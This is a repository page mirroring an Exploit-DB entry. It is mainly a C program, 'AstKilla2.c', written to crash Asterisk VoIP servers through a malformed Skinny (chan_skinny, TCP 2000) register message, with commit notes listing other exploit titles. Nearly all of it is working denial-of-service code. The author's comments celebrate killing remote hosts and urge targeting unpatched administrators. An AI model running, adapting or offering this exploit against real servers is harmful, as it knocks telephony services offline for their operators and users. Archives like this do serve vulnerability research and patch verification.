bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/dos/4196.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

181 lines
4.7 KiB
C
Executable file
Raw Blame History

/*
* AstKilla2.c
* gcc -o astkilla2 astkilla2.c
* ./astkilla2 -h 216.246.**.***
* In no event will the author of this source be liable for any loss or damage of a material or
* immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults.
chan_skinny runs on 2000/TCP if you find a host with this open there is a really decent chance it's a asterisk machine some admin
forgot to disable chan_skinny on (which is default).. this should be a to all of those who don't lock down what they dont need (what is this 1999 ?)
this is really quite old but as it turns out someone made the bug public, how sad.. but eh there are more fish in sea ;)
well here is a exploit for everyone who didn't take a look at the code.
-- = fbff = --
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/tcp.h>
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabilities Request Message\n",NULL},
{0x9f,"Reset Message\n", NULL}
};
int skinny_client_read(struct skinny_client *sc)
{
int ret;
int elm;
int type;
int i;
char buf[SKINNY_MAX_SIZE];
struct skinny_client_message scm;
memset(&scm,0x00,sizeof(struct skinny_client_message));
memset(&buf,0x00,sizeof(buf));
elm = (sizeof(message_list)/sizeof(struct messages));
ret = read(sc->sd,&buf,sizeof(buf));
if (ret == -1) {
printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n");
return -1;
} else if (ret < sizeof(struct skinny_client_message) - 4){
printf("we got some data back from the server just to little of it!\n");
} else {
printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. HOW SAD\n");
}
return 0;
}
int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm)
{
int res;
int len;
char *outbuf;
int test;
len = 90;
scm->len = 3;
outbuf = malloc(len);
if (!outbuf) {
return -1;
}
memset(outbuf,0x41,len);
/* place the 12 bytes header into outbuf */
memcpy(outbuf,scm,12);
/* place the data into outbuf */
memcpy(outbuf+12,scm->data,len-12);
res = write(sc->sd,outbuf,len);
printf("++ Wrote %i bytes\n", res);
return 0;
}
/* send out a client register message to the remote skinny node */
int skinny_client_register(struct skinny_client *sc)
{
struct skinny_client_message scm;
struct register_message *rm;
int len;
rm = malloc(sizeof(struct register_message )) + 4;
if (!rm) {
printf("we could not allocated space for the register message\n");
return -1;
}
len = sizeof(struct register_message);
scm.len = htonl(len);
scm.e = htonl(REGISTER_MESSAGE);
scm.data = (char *)rm;
strcpy(rm->name,"SEP0007EB463101\x00");
rm->type = 30006;
skinny_client_sendmessage(sc,&scm);
skinny_client_read(sc);
return 0;
}
int skinny_client_connect(struct skinny_client *sc)
{
int ret;
sc->sd = socket(AF_INET,SOCK_STREAM,0);
if (sc->sd == -1) {
return -1;
}
sc->saddr.sin_family = AF_INET;
sc->saddr.sin_port = htons(SKINNY_TCP_PORT);
sc->saddr.sin_addr.s_addr = inet_addr(sc->rhost);
ret = connect(sc->sd, (struct sockaddr *)&sc->saddr,sizeof(struct sockaddr));
if (ret != 0) {
printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n");
return -1;
}
printf("+++ CONNECTION OK\n");
sc->active = 1;
return 0;
}
int main(int argc, char **argv)
{
int i;
struct skinny_client *sc;
pthread_attr_t attr;
sc = malloc(sizeof(struct skinny_client));
memset(sc,0,sizeof(struct skinny_client));
for (i=0;i<argc;i++) {
if (!strcmp(argv[i], "-h")) {
strcpy(sc->rhost,argv[i+1]);
}
}
if (*sc->rhost == 0) {
printf("+++ You must run with the -h option\n");
return 0;
}
skinny_client_connect(sc);
skinny_client_register(sc);
return 0;
}
// milw0rm.com [2007-07-18]
Reference in a new issue View git blame Copy permalink